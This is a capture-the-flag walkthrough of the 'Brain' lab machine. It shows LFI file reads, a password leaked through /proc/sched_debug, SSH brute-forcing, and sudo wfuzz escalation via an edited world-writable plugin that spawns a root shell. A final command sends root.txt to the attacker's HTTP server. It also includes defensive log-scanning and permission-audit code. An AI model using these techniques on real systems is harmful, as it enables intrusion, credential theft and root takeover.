Vulnyx-Brain-Walkthrough
城南花已开

Information gathering

Service detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.213 08:00:27:e6:6e:9d PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.087 seconds (122.66 hosts/sec). 4 responded
export ip=192.168.60.213
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.213:22
Open 192.168.60.213:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-27 12:01 CST
Initiating ARP Ping Scan at 12:01
Scanning 192.168.60.213 [1 port]
Completed ARP Ping Scan at 12:01, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:01
Completed Parallel DNS resolution of 1 host. at 12:01, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:01
Scanning 192.168.60.213 [2 ports]
Discovered open port 80/tcp on 192.168.60.213
Discovered open port 22/tcp on 192.168.60.213
Completed SYN Stealth Scan at 12:01, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.213
Host is up, received arp-response (0.00091s latency).
Scanned at 2025-02-27 12:01:10 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:E6:6E:9D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Scan for directories

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.213
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 361]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

We find an index.php.

LFI (Local File Inclusion)

Guessing that there is an LFI vulnerability.

Fuzzing the parameter name turns up the parameter include.

❯ wfuzz -c -u "http://$ip/index.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.213/index.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001059: 200 33 L 64 W 1750 Ch "include"

curl it, and we get the username ben.

❯ curl "$ip/index.php?include=/etc/passwd"
<pre>
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 2927.102286 1731 120 0.000000 509.025216 0.000000 0 0 /
</pre>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ben:x:1000:1000:ben,,,:/home/ben:/bin/bash

Try brute-forcing with hydra.

Nothing comes out.

❯ hydra -l ben -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-27 12:25:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.213:22/
[STATUS] 226.00 tries/min, 226 tries in 00:01h, 14344179 to do in 1057:50h, 10 active
[STATUS] 190.67 tries/min, 572 tries in 00:03h, 14343833 to do in 1253:50h, 10 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

Kernel scheduling information

So the only way in is through the LFI: look for valuable files.

Run wfuzz again, using the -ss parameter to regex-filter for responses that contain ben.

There are still a lot of results, but going by file name, I feel many of them don't need to be read.

❯ wfuzz -c -u "http://$ip/index.php?include=/FUZZ"  -w /usr/share/seclists/Discovery/Web-Content/LinuxFileList.txt --ss "ben" --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.213/index.php?include=/FUZZ
Total requests: 87018

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000215: 200 41 L 62 W 2483 Ch "etc/ssl/certs/Izenpe.com.pem"
000000192: 200 41 L 62 W 2483 Ch "etc/ssl/certs/cc450945.0"
000000500: 200 3519 L 3812 W 214281 Ch "etc/ssl/certs/ca-certificates.crt"
000000611: 200 428 L 1347 W 10407 Ch "etc/grub.d/00_header"
000000734: 200 60 L 79 W 1048 Ch "etc/group"
000001005: 200 688 L 9070 W 243358 Ch "etc/alternatives/pico"
000001164: 200 688 L 9070 W 243358 Ch "etc/alternatives/editor"
000001636: 200 60 L 79 W 1073 Ch "etc/group-"
000002409: 200 585 L 2584 W 19135 Ch "etc/services"
000002729: 200 86023 L 86042 W 835048 Ch "etc/dictionaries-common/words"
000002887: 200 33 L 64 W 1750 Ch "etc/passwd"
000002916: 200 33 L 64 W 1758 Ch "etc/passwd-"
000003123: 200 2718 L 30871 W 900908 Ch "sbin/ldconfig"
000003197: 200 105023 L 1030124 W 31818627 Ch "var/cache/apt/srcpkgcache.bin"
000003663: 200 10635 L 231792 W 1952533 Ch "var/cache/debconf/templates.dat-old"
000003662: 200 10635 L 231792 W 1952533 Ch "var/cache/debconf/templates.dat"
000004036: 200 232 L 22807 W 253170 Ch "var/cache/man/es/index.db"
000004030: 200 21 L 2154 W 24848 Ch "var/cache/man/de/index.db"
000004072: 200 272 L 26885 W 294817 Ch "var/cache/man/index.db"
000003644: 200 105045 L 1030662 W 31819012 Ch "var/cache/apt/pkgcache.bin"
000004242: 200 8478 L 40057 W 355350 Ch "var/backups/dpkg.status.0"
000004506: 200 38 L 181 W 136275 Ch "var/log/wtmp"
000005111: 200 233 L 1274 W 17143 Ch "var/lib/dpkg/info/bash-completion.postinst"
000005608: 200 1232 L 17294 W 130653 Ch "var/lib/dpkg/info/console-setup.templates"
000005754: 200 1203 L 24100 W 219680 Ch "var/lib/dpkg/info/tzdata.templates"
000005821: 200 37849 L 148361 W 1806202 Ch "var/lib/dpkg/info/keyboard-configuration.config"
000005955: 200 1159 L 11554 W 93263 Ch "var/lib/dpkg/info/dictionaries-common.templates"
000006548: 200 201 L 1179 W 16171 Ch "var/lib/dpkg/info/bash-completion.prerm"
000007002: 200 224 L 1234 W 16708 Ch "var/lib/dpkg/info/bash-completion.postrm"
000007299: 200 235 L 1269 W 17049 Ch "var/lib/dpkg/info/bash-completion.preinst"
000007326: 200 459 L 2831 W 23047 Ch "var/lib/dpkg/info/ssl-cert.templates"
000007512: 200 72 L 712 W 6179 Ch "var/lib/dpkg/info/apparmor.templates"
000007966: 200 180 L 3173 W 22592 Ch "var/lib/dpkg/info/man-db.templates"
000008228: 200 3520 L 49730 W 408610 Ch "var/lib/dpkg/info/keyboard-configuration.templates"
000008785: 200 1328 L 12825 W 99036 Ch "var/lib/dpkg/info/debconf.templates"
000009373: 200 3712 L 46326 W 331816 Ch "var/lib/dpkg/info/grub-pc.templates"
000010030: 200 454 L 920 W 35982 Ch "var/lib/dpkg/info/bash-completion.md5sums"
000010730: 200 82 L 229 W 2493 Ch "var/lib/dpkg/info/grub-pc.postrm"
000011296: 200 249 L 2649 W 22202 Ch "var/lib/dpkg/info/ucf.templates"
000011789: 200 120 L 643 W 4745 Ch "var/lib/dpkg/info/dbus.postinst"
000012141: 200 370 L 3931 W 31497 Ch "var/lib/dpkg/info/libpam-runtime.templates"
000012260: 200 699 L 718 W 32310 Ch "var/lib/dpkg/info/bash-completion.list"
000012602: 200 8478 L 40057 W 355350 Ch "var/lib/dpkg/status"
000012601: 200 8480 L 40061 W 355342 Ch "var/lib/dpkg/status-old"
000012890: 200 21738 L 86817 W 611156 Ch "var/lib/usbutils/usb.ids"
000013581: 200 230 L 804 W 8423 Ch "boot/grub/grub.cfg"
000013650: 200 36 L 229 W 7260 Ch "boot/grub/i386-pc/luks.mod"
000013689: 200 24 L 202 W 6113 Ch "boot/grub/i386-pc/loadenv.mod"
000013804: 200 32 L 367 W 10292 Ch "boot/grub/i386-pc/cryptodisk.mod"
000013919: 200 164 L 1229 W 12761 Ch "proc/sched_debug"
000084424: 200 688 L 9070 W 243358 Ch "bin/nano"
000084416: 200 156 L 1080 W 43813 Ch "bin/cat"
000084535: 200 688 L 9070 W 243358 Ch "bin/rnano"

Total time: 44.82363
Processed Requests: 87018
Filtered Requests: 86965
Requests/sec.: 1941.341

The /proc/sched_debug file yields the user credential ben:B3nP4zz: the runnable-tasks list in the scheduler debug output contains a process whose name is literally ben:B3nP4zz, so the password leaked through a process name.

❯ curl "$ip/index.php?include=/proc/sched_debug"
<pre>
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 2927.102286 1731 120 0.000000 509.025216 0.000000 0 0 /
</pre>

Sched Debug Version: v0.11, 4.19.0-23-amd64 #1
ktime : 2109180.881277
sched_clk : 2109114.562493
cpu_clk : 2109108.556545
jiffies : 4295419545
sched_clock_stable() : 1

sysctl_sched
.sysctl_sched_latency : 6.000000
.sysctl_sched_min_granularity : 0.750000
.sysctl_sched_wakeup_granularity : 1.000000
.sysctl_sched_child_runs_first : 0
.sysctl_sched_features : 4118331
.sysctl_sched_tunable_scaling : 1 (logaritmic)

cpu#0, 3686.400 MHz
.nr_running : 3
.load : 3145728
.nr_switches : 1438966
.nr_load_updates : 524046
.nr_uninterruptible : 0
.next_balance : 4294.892296
.curr->pid : 677
.clock : 2109108.696792
.clock_task : 2109108.696792
.cpu_load[0] : 0
.cpu_load[1] : 0
.cpu_load[2] : 0
.cpu_load[3] : 0
.cpu_load[4] : 0
.avg_idle : 1000000
.max_idle_balance_cost : 500000

cfs_rq[0]:/
.exec_clock : 0.000000
.MIN_vruntime : 45197.752305
.min_vruntime : 45200.752305
.max_vruntime : 45200.752305
.spread : 3.000000
.spread0 : 0.000000
.nr_spread_over : 0
.nr_running : 3
.load : 3145728
.runnable_weight : 3145728
.load_avg : 82
.runnable_load_avg : 81
.util_avg : 40
.util_est_enqueued : 29
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0

rt_rq[0]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.000000
.rt_runtime : 950.000000

dl_rq[0]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0

runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 45143.173999 2452 120 0.000000 1589.438041 0.000000 0 0 /
S kthreadd 2 42926.939316 118 120 0.000000 5.587628 0.000000 0 0 /
I rcu_gp 3 118.571759 2 100 0.000000 0.003012 0.000000 0 0 /
I rcu_par_gp 4 120.072968 2 100 0.000000 0.002937 0.000000 0 0 /
I kworker/0:0H 6 1877.160597 4 100 0.000000 0.102454 0.000000 0 0 /
I kworker/u2:0 7 10417.314168 82 120 0.000000 1.616467 0.000000 0 0 /
I mm_percpu_wq 8 126.170331 2 100 0.000000 0.002803 0.000000 0 0 /
R ksoftirqd/0 9 45197.752305 132791 120 0.000000 22632.345691 0.000000 0 0 /
I rcu_sched 10 45197.759654 77450 120 0.000000 397.725220 0.000000 0 0 /
I rcu_bh 11 132.172871 2 120 0.000000 0.001940 0.000000 0 0 /
S migration/0 12 0.000000 531 0 0.000000 23.247226 0.000000 0 0 /
S cpuhp/0 14 2390.402087 9 120 0.000000 0.270836 0.000000 0 0 /
S kdevtmpfs 15 2416.502151 148 120 0.000000 1.210340 0.000000 0 0 /
I netns 16 144.443039 2 100 0.000000 0.002582 0.000000 0 0 /
S kauditd 17 2383.511704 4 120 0.000000 0.028072 0.000000 0 0 /
S khungtaskd 18 44970.453657 19 120 0.000000 1.724628 0.000000 0 0 /
S oom_reaper 19 149.945486 2 120 0.000000 0.002175 0.000000 0 0 /
I writeback 20 151.945978 2 100 0.000000 0.002976 0.000000 0 0 /
S kcompactd0 21 153.947482 2 120 0.000000 0.002672 0.000000 0 0 /
S ksmd 22 155.950794 2 125 0.000000 0.002928 0.000000 0 0 /
S khugepaged 23 45190.873615 209 139 0.000000 20.586764 0.000000 0 0 /
I crypto 24 159.948761 2 100 0.000000 0.002703 0.000000 0 0 /
I kintegrityd 25 161.948353 2 100 0.000000 0.000763 0.000000 0 0 /
I kblockd 26 163.949432 2 100 0.000000 0.002272 0.000000 0 0 /
I edac-poller 27 235.870379 2 100 0.000000 0.003288 0.000000 0 0 /
I devfreq_wq 28 237.371180 2 100 0.000000 0.002670 0.000000 0 0 /
S watchdogd 29 0.000000 2 0 0.000000 0.001788 0.000000 0 0 /
S kswapd0 32 1451.903771 3 120 0.000000 0.002929 0.000000 0 0 /
I kthrotld 50 1499.024303 2 100 0.000000 0.002362 0.000000 0 0 /
I ipv6_addrconf 51 1510.669212 2 100 0.000000 0.000000 0.000000 0 0 /
I kstrp 61 1543.280634 2 100 0.000000 0.002966 0.000000 0 0 /
I ata_sff 98 1665.542410 2 100 0.000000 0.003864 0.000000 0 0 /
S scsi_eh_0 109 1807.335768 4 120 0.000000 35.024347 0.000000 0 0 /
I scsi_tmf_0 110 1671.708300 2 100 0.000000 0.002117 0.000000 0 0 /
S scsi_eh_1 111 1875.732614 18 120 0.000000 18.275035 0.000000 0 0 /
S scsi_eh_2 113 2396.063294 51 120 0.000000 9.422290 0.000000 0 0 /
I scsi_tmf_1 114 1673.173460 2 100 0.000000 0.001896 0.000000 0 0 /
I scsi_tmf_2 115 1673.566536 2 100 0.000000 0.001691 0.000000 0 0 /
I kworker/u2:2 117 45192.737836 566 120 0.000000 139.992237 0.000000 0 0 /
I kworker/0:1H 155 45196.053762 3984 100 0.000000 623.217104 0.000000 0 0 /
I kworker/u3:0 185 2141.968675 2 100 0.000000 0.001474 0.000000 0 0 /
S jbd2/sda1-8 187 45149.089609 988 120 0.000000 89.302385 0.000000 0 0 /
Iext4-rsv-conver 188 2163.416900 2 100 0.000000 0.002097 0.000000 0 0 /
Ssystemd-journal 220 45143.747435 7202 120 0.000000 1024.578213 0.000000 0 0 /
S systemd-udevd 240 45109.315298 666 120 0.000000 64.713226 0.000000 0 0 /
Ssystemd-timesyn 257 44348.964777 94 120 0.000000 25.996827 0.000000 0 0 /
S sd-resolve 288 10542.881437 22 120 0.000000 2.602704 0.000000 0 0 /
I ttm_swap 297 2390.589795 2 100 0.000000 0.003351 0.000000 0 0 /
S irq/18-vmwgfx 299 0.000000 3 49 0.000000 0.020887 0.000000 0 0 /
S dbus-daemon 302 39165.087993 430 120 0.000000 31.643684 0.000000 0 0 /
S cron 305 45141.415737 81 120 0.000000 8.615342 0.000000 0 0 /
S systemd-logind 306 44349.015937 120 120 0.000000 18.426584 0.000000 0 0 /
S rsyslogd 307 42224.395011 87 120 0.000000 6.820937 0.000000 0 0 /
S in:imuxsock 317 45142.894486 4899 120 0.000000 90.617334 0.000000 0 0 /
S in:imklog 318 10427.553240 11 120 0.000000 6.010143 0.000000 0 0 /
S rs:main Q:Reg 322 45142.901728 4916 120 0.000000 86.714084 0.000000 0 0 /
S cron 311 2408.015798 40 120 0.000000 5.486087 0.000000 0 0 /
S sh 326 2411.557676 10 120 0.000000 2.520946 0.000000 0 0 /
S ben:B3nP4zz 334 2417.960198 54 120 0.000000 6.438279 0.000000 0 0 /
S sleep 344 2419.956260 3 120 0.000000 1.784380 0.000000 0 0 /
S dhclient 349 40955.699589 134 120 0.000000 17.024843 0.000000 0 0 /
S agetty 352 40926.763663 20 120 0.000000 3.511291 0.000000 0 0 /
S sshd 370 45142.918441 1065 120 0.000000 200.017816 0.000000 0 0 /
S apache2 424 45196.420478 2129 120 0.000000 154.609891 0.000000 0 0 /
S apache2 596 35938.370222 61495 120 0.000000 12546.197959 0.000000 0 0 /
S apache2 598 35938.371761 61283 120 0.000000 12156.942207 0.000000 0 0 /
S apache2 614 36021.888817 60104 120 0.000000 11240.450645 0.000000 0 0 /
>R apache2 677 45199.456701 481 120 0.000000 226.352394 0.000000 0 0 /
S apache2 679 35938.372543 405 120 0.000000 195.558113 0.000000 0 0 /
S apache2 691 36584.871681 168 120 0.000000 69.766810 0.000000 0 0 /
S apache2 692 35938.403125 211 120 0.000000 92.634032 0.000000 0 0 /
S apache2 693 35938.375499 151 120 0.000000 77.056777 0.000000 0 0 /
S apache2 695 35938.372104 164 120 0.000000 66.376962 0.000000 0 0 /
S apache2 696 35938.371011 172 120 0.000000 92.238199 0.000000 0 0 /
I kworker/0:1 1038 42930.187897 7419 120 0.000000 737.852032 0.000000 0 0 /
I kworker/0:2 1306 45197.089765 1781 120 0.000000 205.988541 0.000000 0 0 /
R kworker/0:0 1592 45200.752305 2187 120 0.000000 218.180890 0.000000 0 0 /

LFI2RCE

Testing shows that the php://filter wrapper can be used to display source code (base64-encoded).

❯ curl "$ip/index.php?include=php://filter/convert.base64-encode/resource=index.php"
<pre>
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd 1 2927.102286 1731 120 0.000000 509.025216 0.000000 0 0 /
</pre>


That makes things slightly simpler than the above: PHP filter chains can be used to achieve RCE (arbitrary code execution).

LFI2RCE via PHP filters - HackTricks

HackMyVM-Medusa-Walkthrough | Pepster’Blog

However, the user obtained via this method is www-data.

Afterwards, ben's account credentials can also be found through the user's processes.
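From the defender's side, all three requests used above (an absolute path such as /etc/passwd or /proc/sched_debug, and a php://filter wrapper in the include parameter) are visible in the web server's access log. The following Python is an added example, not part of the original walkthrough: it scans combined-format access log lines for those LFI indicators plus ../ traversal (also in URL-encoded form). The log lines are constructed for this example; the parameter name include is the one found on the box, but the scanner inspects every query parameter, so it is not tied to that name.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache/nginx "combined" log format. The requests mirror
# the ones made in the walkthrough, but the lines themselves are made up for this example.
SAMPLE_LOG = """\
192.168.60.100 - - [27/Feb/2025:12:10:01 +0800] "GET /index.php HTTP/1.1" 200 361 "-" "curl/8.5.0"
192.168.60.100 - - [27/Feb/2025:12:10:05 +0800] "GET /index.php?include=/etc/passwd HTTP/1.1" 200 1750 "-" "curl/8.5.0"
192.168.60.100 - - [27/Feb/2025:12:10:09 +0800] "GET /index.php?include=/proc/sched_debug HTTP/1.1" 200 12761 "-" "Wfuzz/3.1.0"
192.168.60.100 - - [27/Feb/2025:12:10:12 +0800] "GET /index.php?include=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 480 "-" "curl/8.5.0"
192.168.60.100 - - [27/Feb/2025:12:10:15 +0800] "GET /index.php?include=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 26 "-" "curl/8.5.0"
192.168.60.100 - - [27/Feb/2025:12:10:20 +0800] "GET /index.php?page=about HTTP/1.1" 200 361 "-" "Mozilla/5.0"
"""

# The quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# PHP stream wrappers that should never arrive in a user-controlled include path.
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob|file|compress\.\w+)://", re.I)
# Absolute paths into sensitive system trees.
ABS_PATH_RE = re.compile(r"^/(etc|proc|sys|dev|var|home|root|usr|boot)(/|$)")
# "../" or "..\" anywhere in the value.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def classify_value(raw: str) -> List[str]:
    """Return the LFI indicators present in one query-string value."""
    # parse_qsl already decoded once; decode again to catch double-encoding.
    value = unquote(raw)
    indicators = []
    if WRAPPER_RE.search(value):
        indicators.append("stream-wrapper")
    if ABS_PATH_RE.search(value):
        indicators.append("absolute-path")
    if TRAVERSAL_RE.search(value):
        indicators.append("traversal")
    return indicators


def scan_access_log(text: str) -> List[Dict]:
    """Scan combined-format log text; return one finding per suspicious parameter."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, raw in parse_qsl(query, keep_blank_values=True):
            indicators = classify_value(raw)
            if indicators:
                findings.append({
                    "line": line_no,
                    "param": param,
                    "value": unquote(raw),
                    "indicators": indicators,
                })
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['param']}={hit['value']!r} -> {', '.join(hit['indicators'])}")
```

Run stand-alone it reports lines 2 to 5 with their indicators; on a real server the same function is fed from the access log. The matching fix on the application side is to never pass the parameter to include() directly but to map it against an allowlist of page names.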

User

SSH in; the user has sudo rights.

Privilege escalation is possible through wfuzz.

❯ ssh ben@$ip
ben@192.168.60.213's password:
Linux brain 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64
ben@brain:~$ cat user.txt
4be68799a5cef6a6e2b36379e8ae2759
ben@brain:~$ sudo -l
Matching Defaults entries for ben on Brain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ben may run the following commands on Brain:
(root) NOPASSWD: /usr/bin/wfuzz

Root privilege escalation

But it is a fuzzing tool; how can it be used to escalate privileges?

wfuzz has a -z parameter that selects a payload module.

Find the wfuzz module path: /usr/lib/python3/dist-packages/wfuzz

ben@brain:~$ find / -name wfuzz 2>/dev/null
/usr/lib/python3/dist-packages/wfuzz
/usr/share/wfuzz
/usr/share/doc/wfuzz
/usr/bin/wfuzz

Searching reveals a range.py module with 777 permissions (world-writable), so the current user can modify it.

ben@brain:~$ ls -al /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/
total 88
drwxr-xr-x 3 root root 4096 abr 19 2023 .
drwxr-xr-x 8 root root 4096 abr 19 2023 ..
-rw-r--r-- 1 root root 2053 ene 12 2019 autorize.py
-rw-r--r-- 1 root root 1232 ene 12 2019 bing.py
-rw-r--r-- 1 root root 962 ene 12 2019 buffer_overflow.py
-rw-r--r-- 1 root root 3581 ene 12 2019 burplog.py
-rw-r--r-- 1 root root 7807 ene 12 2019 burpstate.py
-rw-r--r-- 1 root root 1438 ene 12 2019 dirwalk.py
-rw-r--r-- 1 root root 1370 ene 12 2019 file.py
-rw-r--r-- 1 root root 1199 ene 12 2019 guitab.py
-rw-r--r-- 1 root root 1447 ene 12 2019 hexrand.py
-rw-r--r-- 1 root root 1546 ene 12 2019 hexrange.py
-rw-r--r-- 1 root root 0 ene 12 2019 __init__.py
-rw-r--r-- 1 root root 1594 ene 12 2019 ipnet.py
-rw-r--r-- 1 root root 1549 ene 12 2019 iprange.py
-rw-r--r-- 1 root root 1556 ene 12 2019 list.py
-rw-r--r-- 1 root root 3234 ene 12 2019 names.py
-rw-r--r-- 1 root root 1669 ene 12 2019 permutation.py
drwxr-xr-x 2 root root 4096 feb 27 05:39 __pycache__
-rwxrwxrwx 1 root root 1519 abr 19 2023 range.py
-rw-r--r-- 1 root root 699 ene 12 2019 stdin.py
-rw-r--r-- 1 root root 2064 ene 12 2019 wfuzzp.py

Modify the plugin content directly

and escalate with Python.

ben@brain:~$ vi /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
import pty
print ("Success!")
pty.spawn("/bin/bash")
ben@brain:~$ cat /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
import pty
print ("Success!")
pty.spawn("/bin/bash")
ben@brain:~$ sudo /usr/bin/wfuzz -z range 1-2

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

Success!
root@brain:/home/ben# id
uid=0(root) gid=0(root) grupos=0(root)
root@brain:/home/ben# cat /root/root.txt
08c391c2d775390f54ee859d7395ac68
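Two conditions combined here: the sudo rule lets ben run wfuzz as root with NOPASSWD, and one of the Python plugin files it loads (range.py) is world-writable, so anyone who can edit that file runs code as root. Fixing either closes the path. As an added example that is not from the walkthrough, the following Python audits a plugin directory for files or subdirectories writable by group or others, the same check that `find <dir> -perm /o+w` does from the shell, and builds a constructed toy copy of the payloads/ directory (placeholder contents, not the real wfuzz plugins) with one 0777 file to run against.

```python
import os
import stat
import tempfile
from typing import List


def find_group_or_world_writable(root: str) -> List[str]:
    """Return paths under root (relative to root, sorted) whose mode bits allow
    group or others to write. Symlinks are skipped: their own mode is meaningless."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(os.path.relpath(path, root))
    return sorted(findings)


def build_sample_tree() -> str:
    """Construct a toy copy of a payloads/ plugin directory for the example
    (placeholder bodies, not the real wfuzz code): every file 0644 except
    range.py, which is 0777 like the one found on the box."""
    root = tempfile.mkdtemp(prefix="payloads-")
    files = {"__init__.py": 0o644, "file.py": 0o644, "range.py": 0o777, "stdin.py": 0o644}
    for name, mode in files.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("# placeholder plugin body\n")
        os.chmod(path, mode)  # chmod is not subject to umask, unlike open()/mkdir()
    cache = os.path.join(root, "__pycache__")
    os.mkdir(cache)
    os.chmod(cache, 0o755)
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for rel in find_group_or_world_writable(sample):
        print("writable by non-owner:", rel)
```

On the real system the function would be pointed at /usr/lib/python3/dist-packages/wfuzz (or the whole dist-packages tree); anything it reports under a path that root ever imports is a privilege-escalation primitive. The sudo side of the fix is not to grant root execution of interpreter-based tools whose code or plugins live on disk, because such tools load arbitrary Python at runtime.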

Actually, the simpler route is to read the flag directly: start an HTTP server on Kali and use root.txt as the wordlist.

Although an encoding error is reported, you can still see wfuzz's request in the log.

ben@brain:~$ sudo wfuzz -u "http://192.168.60.100?FUZZ" -w /root/root.txt

